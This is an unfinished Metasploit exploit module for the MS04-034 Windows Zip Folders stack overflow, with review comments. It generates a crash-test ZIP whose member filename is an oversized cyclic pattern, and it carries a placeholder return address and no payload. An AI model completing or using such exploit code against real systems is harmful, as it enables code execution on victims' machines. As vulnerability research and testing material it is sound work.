##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex/zip'


# File-format exploit module for the Windows Zip Folders stack overflow
# addressed by MS04-034 (CVE-2004-0575). The module is explicitly tagged
# [INCOMPLETE]: the exploit method below only writes a crash-test archive
# (a cyclic filename pattern) and never places a payload or an SEH record,
# so the declared 'Payload' space and the Seh mixin are currently unused.
class MetasploitModule < Msf::Exploit::Remote
	Rank = GreatRanking

	# FILEFORMAT provides file_create (writes the generated archive to disk);
	# Seh is included but none of its helpers are called in #exploit yet.
	include Msf::Exploit::FILEFORMAT
	include Msf::Exploit::Remote::Seh

	# Registers module metadata and the FILENAME option with the framework.
	#
	# @param info [Hash] metadata supplied by the framework, merged via update_info
	def initialize(info = {})
		super(update_info(info,
			'Name'           => '[INCOMPLETE] Windows Zip File Handling Stack Buffer Overflow',
			# NOTE(review): the description still contains a "??" placeholder
			# for the user interaction needed to trigger the bug -- fill in or
			# reword before the module is considered complete.
			'Description'    => %q{
					This module exploits a stack-based buffer overflow vulnerability in
				Windows Zip Folders prior to MS04-034.

				In order for the command to be executed, an attacker must convince someone to
				open a specially crafted zip file and ??

				By doing so, an attacker can execute arbitrary
				code as the victim user.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Tarako',
					'jduck'
				],
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2004-0575' ],
					[ 'MSB', 'MS04-034' ],
					[ 'OSVDB', '10695' ],
					[ 'OSVDB', '12252' ],
					# NOTE(review): BID 34044 looks high for an Oct 2004 disclosure
					# (BIDs of that era were in the ~11000 range) -- verify this entry.
					[ 'BID', '34044' ],
					[ 'URL', 'http://research.eeye.com/html/advisories/published/AD20041012A.html' ]
				],
         'Platform'       => [ 'win' ],
         # 0x800 bytes of payload space are declared, but #exploit never
         # references `payload`, so this value has no effect at present.
         'Payload'        =>
				{
					'Space'    => 0x800,
					'BadChars' => ''
				},
			'Targets'        =>
				[
					# 0x41424344 ("DCBA" little-endian) is a placeholder return
					# address, not a real pop/pop/ret gadget; #exploit does not use it.
					['Windows Universal', { 'Ret' => 0x41424344 }], # p/p/r
				],
			'DisclosureDate' => 'Oct 12 2004',
			'DefaultTarget'  => 0))

		# Output file name for the generated archive; defaults to msf.zip.
		register_options(
		 	[
				OptString.new('FILENAME', [ true, 'The output file name.', 'msf.zip']),
			], self.class)

	end


	# Builds a single-entry ZIP archive whose member filename is a 0x9200-byte
	# cyclic pattern, then writes it to FILENAME via file_create.
	#
	# The resulting artifact is a crash/offset-discovery test case only: no
	# payload, SEH frame or target return address is written. For defenders,
	# the distinguishing trait of the file is a zip central-directory entry
	# with an unusually long (0x9200-byte) member name plus a 4-byte extra
	# field and a 4-byte archive comment.
	#
	# @return [void]
	def exploit

		# XXX: Unable to trigger on XP SP1
		# Rex::Text.pattern_create yields a non-repeating cyclic string so a
		# crash address can be mapped back to an offset in the filename.
		fname = Rex::Text.pattern_create(0x9200)

		# rand(2048) may return 0, in which case the member body is empty;
		# presumably harmless for a crash test, but worth noting.
		content = rand_text_alphanumeric(rand(2048))

		zip = Rex::Zip::Archive.new
		# 'V' packs a 32-bit little-endian unsigned value; these are marker
		# constants placed in the zip extra field and archive comment.
		xtra = [0xdac0ffee].pack('V')
		comment = [0xbadc0ded].pack('V')
		zip.add_file(fname, content, xtra, comment)

		# Create the file
		print_status("Creating '#{datastore['FILENAME']}' file...")

		file_create(zip.pack)
	end

end
